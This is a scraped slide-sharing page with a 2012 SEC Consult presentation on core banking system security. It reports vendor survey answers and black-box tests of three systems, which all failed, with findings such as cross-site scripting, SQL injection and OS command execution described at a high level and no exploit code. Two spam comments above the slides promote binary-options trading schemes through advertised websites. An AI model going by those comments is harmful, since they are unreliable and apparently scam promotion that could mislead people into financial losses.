Where the money is – Security of CBS.

880 views

Published on

Published in: Technology, News & Politics
  • Without an effective trading strategy, there is no way you can make money in this business. Let me briefly catch you up so that you don't miss out on this phenomenal opportunity. I am sharing with you a GEORGESEPROVITZ.COM Technology
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Due to the fact that binary options functions more like a "yes or no" kind of trade mechanism, there is a tendency among inexperienced traders to trade it like a poker game or like they would do in the slot machines of Vegas. Let me briefly catch you up so that you don't miss out on this phenomenal opportunity. I am sharing with you a 30DAYCHANGEPROGRAM.COM Technology
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

Where the money is – Security of CBS.

  1. 1. Where the money is. – Security of CBS. Advisor for your information security.Version: 1.0Autor: Ulrich FleckVerantwortlich: Ulrich FleckDatum: 27.5.2012Vertraulichkeitsstufe: Public
  2. 2. Agenda • About SEC Consult • About the study • Threats and Drivers for Application Security in CBS • Maturity of Application Security in CBS • Security Crash Test of selected CBS products • Resume • Discussion Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –2 Confidentiality Class: Public All rights reserved
  3. 3. SEC Consult– Who we are• Leading international application security consultancy• Founded 2002• Headquarters near Vienna, Canada Germany Lithuania Austria Austria Central and Easter Europe• Delivery Centers in Austria, Germany, Lithuania and Singapore• Strong customer base in Central Singapore and Eastern Europe• Increasing customer base of clients with global business (esp. out of Top-10 US and European software vendors)• 45+ application security experts• Industry focus banks, software SEC Consult Headquarter vendors, government SEC Consult Office Other SEC Consult Clients Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH – Confidentiality Class: Public All rights reserved
  4. 4. Our Key Question What is the promise and the reality of applications security for core banking systems??? Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –4 Confidentiality Class: Public All rights reserved
  5. 5. Part 2 – Security Crash Test at Part 1 – Answers provided vendor • We created a questionnaire with some • As the answers to the questionnaire 50 questions about security especially are just a subjective picture of the with regards to core banking systems vendors themselves we wanted to test • This questionnaire was provided to a perform real life security crash tests preselected set of vendors together ad the vendors with the offer to participate in our • Therefore we offered all vendors an study application security check conducted • We recommended that the IT security by SEC Consult consultants responsible person should answers or • We asked for access to the respective at least quality assure the questions test system and ensured that those and answers test results will be only published high • The methodology for the survey part level in this study and detailed reports was based common known security about the test case results are handed standards, best practices and over solely to the respective vendor guidelines and the experience of Capgemini and SEC Consult Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –5 Confidentiality Class: Public All rights reserved
  6. 6. Part 2 – Security Crash Test at Part 1 – Answers provided vendor • As the answers to the–questionnaire Alternative Part 2 Security Crash • We created a questionnaire with some are just a selected banks of the tests at subjective picture 50 questions about security especially vendors themselves we wanted quite • Some of the vendors where to test with regards to core banking systems perform real life security crash tests interested and seriously considering a • This questionnaire was provided to a ad “Part 2” participation – however none the vendors preselected set of vendors together • Therefore we agree all vendors an did finally offered with the offer to participate in our • Therefore we had to consider an application security check conducted study alternative solution by SEC Consult consultants • We recommended that the IT security • asked for access to the respective • WeFortunately three interested banks, responsible person should answers or test system big interest in thisthose showing and ensured that study, at least quality assure the questions test results the opportunity to perform gave us will be only published high and answers level in this crash tests detailed reports security study and on there system (three CBS in scope of this study) about the test case results are handed • The methodology for the survey part was based common known security • The applied methodology was based over solely to the respective vendor standards, best practices and on common known security standards guidelines and the experience of for applications security, best practices Capgemini and SEC Consult in security tests with a black-box approach and the experience of SEC Consult Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –6 Confidentiality Class: Public All rights reserved
  7. 7. CBS Vendors of this StudyMajor vendors relevant for the international and European market. Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –7 Confidentiality Class: Public All rights reserved
  8. 8. Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –8 Confidentiality Class: Public All rights reserved
  9. 9. Attack surface for core banking systems (simplified) Presentation Layer … Business Logic Tier … Database Layer … … Databases Network … potential entry points for attacker Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –9 Confidentiality Class: Public All rights reserved
  10. 10. What did the vendors say?• Information security of vendor organization • Most of the vendors have an Information Security Management System (ISMS) in place• Software development organization • Roles and responsibilities in the development process documented in accordance to security policies • 90-100% of the (core) development staff on applications security• Methods for secure software development • The enforcement of methods for secure software development Microsoft SDL, OpenSAMM, BSIMM, CMM-SSE is in progress at some vendors Threat modeling and security requirement • Most of the vendors have up to date threat model for each CBS module available Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –10 Confidentiality Class: Public All rights reserved
  11. 11. What did the vendors say? Security Incident Response • Most of the vendors have Software Security Incident Response Process• (Technical) standards and best practices for application security • Technical) application security best practices and standards for web technologies like OWASP, ÖNORM A 7700 (Security requirements for web applications), etc. are already important for vendors • Data privacy standards for applications like EuroPriSe are not in the focus yet • No certifications conducted on application security Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –11 Confidentiality Class: Public All rights reserved
  12. 12. What did the vendors say about complexity? Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –12 Confidentiality Class: Public All rights reserved
  13. 13. What did the vendors say? – Internal QA• Identified Security Vulnerabilities from 1.1.2008 till 30.6.2010 by internal QA/testers before the software was released • Many vendors don’t provide an answer • Range from “none” to hundreds• Identified Security Vulnerabilities from 1.1.2008 till 30.6.2010 security vulnerabilities in already released software modules (“zero-day vulnerabilities”) • Many vendors don’t provide an answer • Range from “none” to hundreds Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –13 Confidentiality Class: Public All rights reserved
  14. 14. Test coverage for application Security Significant differences in the test coverage for different test approaches between the vendors. Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –14 Confidentiality Class: Public All rights reserved
  15. 15. How do you define the maturity level of state of the art (application) security for your CBS product?30+ years with no known security issues. strong & impenetrable security foundation Highly sophisticated CMMi Level 4. High Mature. Mature. Mature. All vendors position themselves to achieve (at least) state-of-the- art application security. This is a clear and consistent commitment and promise to the market. Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –15 Confidentiality Class: Public All rights reserved
  16. 16. Crashtest for 3 CBS (out of 8) Test set-up: • Non of the eight vendor accepted offer for a free of charge security crash test • 3 major European banks stepped in with 3 product of this study – Thanks!!! • Crash-Test with black-box approach and limited effort budget (approx. 15 person days for each product) • Access to CBS with one low privilege user account (standard user) Test objective for a crash test: • Check for toxic (=seriously insecure) software • Identify application security vulnerabilities in Source: http://www.spiegel.de/fotostrecke/fotostrecke-22584-3.html CBS to break the confidentiality, availability or integrity of CBS Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –16 Confidentiality Class: Public All rights reserved
  17. 17. Why attack the CBS from a standard working place? The attacker has several choices to get access to a standard working place: •One active Trojan Hoarse malware Core Banking •Access by cleaning personal, System maintenance, contractors, volunteers, etc •Drive-by infection from website(s) •… Browser Then the attacker starts to look for vulnerabilities to access the Core Banking System in depth… Standard Working Place for CBS For the test we used a low privilege user and tried to expand the privileges and to access sensible data of the Core Banking System. Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –17 Confidentiality Class: Public All rights reserved
  18. 18. Hundreds to thousends CBS szandard working places to choose from For the test we used a low privilege user and tried to expand the privileges and to access sensible data of the Core Banking System. Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –18 Confidentiality Class: Public All rights reserved
  19. 19. Standard Blackbox Approach Tasks: • Use selective special tools and scripts for s ck exploiting security vulnerabilities based on ta vulnerability classes At • Check compliance to state of the art standards Presentation Layer for application security (A7700, OWASP, …) • Adapt or write new exploit code if necessary Business Logic Tier • Validate vulnerabilities • Develop proof of concept material (screen Database Layer shots, dumps, passwords, etc.) • Assess risk and define recommendation Databas e Network Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –19 Confidentiality Class: Public All rights reserved
  20. 20. CBS – Cross site scripting• The problem:• A Cross Site Scripting security vulnerability is used to steal the identity information of a CBS user. First the attacker writes an email to this user with a malicious link, including hidden script code (very short software program). The user receives the email and clicks on that link. The malicious script runs in (the context of) the web browser of the attacked user.• Vulnerability class: • Web application security Input- and Output Validation• Impact for bank: • Account theft • Remotely control the web browser • Record all activities of the user • Initiate changes in transactions (e.g. target account numbers of a transaction on the fly). Secure software development: • Architecture/Design: Failed • Programming: Failed • Test and Quality Assurance: Failed Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –20 Confidentiality Class: Public All rights reserved
  21. 21. CBS – Weak encryption• The problem:• First the attacker traces the data traffic between the CBS client and the CBS server. Due to the weak encryption security vulnerability of the CBS the attacker can bypass the login mechanism.• Vulnerability class: • Design flaw in client- server communication (hash is being build on the client)• Impact for bank: • Account theft • Privilege escalation • Perform a misuse of the account of the user Secure software development: • Architecture/Design: Failed • Programming: Failed • Test and Quality Assurance: Failed Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –21 Confidentiality Class: Public All rights reserved
  22. 22. CBS – Privilege escalation – missing authorization• The problem:• By enumerating several request parameters arbitrary accounts can be overtaken and misused by non privileged users.• Vulnerability class: • Design flaw based on missing authorization• Impact for bank: • Account theft • Privilege escalation • The attacker becomes a more powerful user • Access to administrative functionality • The attacker can misuse the CBS by performing high privilege transactions and functions Secure software development: • Architecture/Design: Failed • Programming: Failed • Test and Quality Assurance: Failed Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –22 Confidentiality Class: Public All rights reserved
  23. 23. CBS – SQL Injection• The problem:• Nothing to add here  should be an extinct vulnerability class• Vulnerability class: • Web application security input–validation & design flaw• Impact for bank: • Extracts valuable (data theft) data of the database • Manipulate data in the database • Account theft • Privilege escalation Secure software development: • Architecture/Design: Failed • Programming: Failed • Test and Quality Assurance: Failed Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –23 Confidentiality Class: Public All rights reserved
  24. 24. CBS – Direct OS Command execution• The problem:• Several flaws led to access to the underlying operating system for non privileged users.• Vulnerability class: • Web application security input–validation & design flaw• Vulnerability class: • Control over the operating system of the server of the CBS. • The CBS system can be shut down or wiped or manipulated with wrong data by the attacker. • Data of the server can be copied to a repository of the attacker. • Additionally, this vulnerability can be used to attack other systems of the bank • Account theft and privilege escalation • Total compromise of system, data backends etc. Secure software development: • Architecture/Design: Failed • Programming: Failed • Test and Quality Assurance: Failed Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –24 Confidentiality Class: Public All rights reserved
  25. 25. Summarizing ! L ED 3 of 3 tested CBS fail application security standard: I ! FA D •e.g. Open Web Application Security Project (OWASP), I LE WASC, BSI ISi-Reihe (Germany), ÖNORM A 7700 (Austria), E D! FA etc.) L F AI 3 of 3 tested CBS are not state of the art in application security CMMi Level 4. High Mature. Mature. Mature. 3 of 3 tested CBS have deficiencies in secure software development •Architecture/Design: Failed •Programming: Failed •Test and Quality Assurance: Failed Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –25 Confidentiality Class: Public All rights reserved
  26. 26. Business Impact for Banks • The found vulnerabilities in 3 of 3 tested CBS • enable unauthorized access Attacks Presentation Layer • disable segregation of duties Business Logic Tier • circumvent the effectiveness of auditing and logging Database Layer • circumvent the effectiveness of strict access control and enable privilege escalation Databas e and therefore can cause violations of compliance Network requirements such as Basel II, SAS70, ISO 27001, national Data privacy protection laws, notational banking specific laws, etc.) Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –26 Confidentiality Class: Public All rights reserved
  27. 27. What to do if you are a bank? Demand state-the-art-application security for CBS • Vendor contracts with mandatory state-of-the-art applications security requirements • Define penalties for not achieving state-of-the-art applications security requirements • Cost sharing for unsuccessful application security tests Prove the vendor claims and promises by testing application security of CBS • Application security tests (Security Quality Gates) Establish additional multi-lines of defense • Measures to at least temporary mitigate some risks of an insecure CBS on other levels of defense (infrastructure, organizational, awareness of users, etc.) The best point in time to detect toxic (=seriously insecure) software is when you buy it. Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –27 Confidentiality Class: Public All rights reserved
  28. 28. Software Vendors already using SEC Consult. Title: SEC Consult Software Security Assurance Services © 2011 SEC Consult Version/Date: 1.1/May 2011 Unternehmensberatung GmbH – Responsible: U. Fleck All rights reserved
  29. 29. How to reach us/me? Austria Ulrich Fleck Mooslackengasse 17 Director A-1190 Vienna Sales and Business Development Austria +43 676 840 301 719 Tel: +43-(0)1-890 30 43-0 Fax: +43-(0)1-890 30 43-15 Email: u.fleck@sec-consult.com Email: office@sec-consult.com www.sec-consult.com Title: Where the money is– CBS Security Version/Date: 1.0 / 27.5.2012 © 2012 SEC Consult Responsable: Ulrich Fleck Unternehmensberatung GmbH –29 Confidentiality Class: Public All rights reserved

×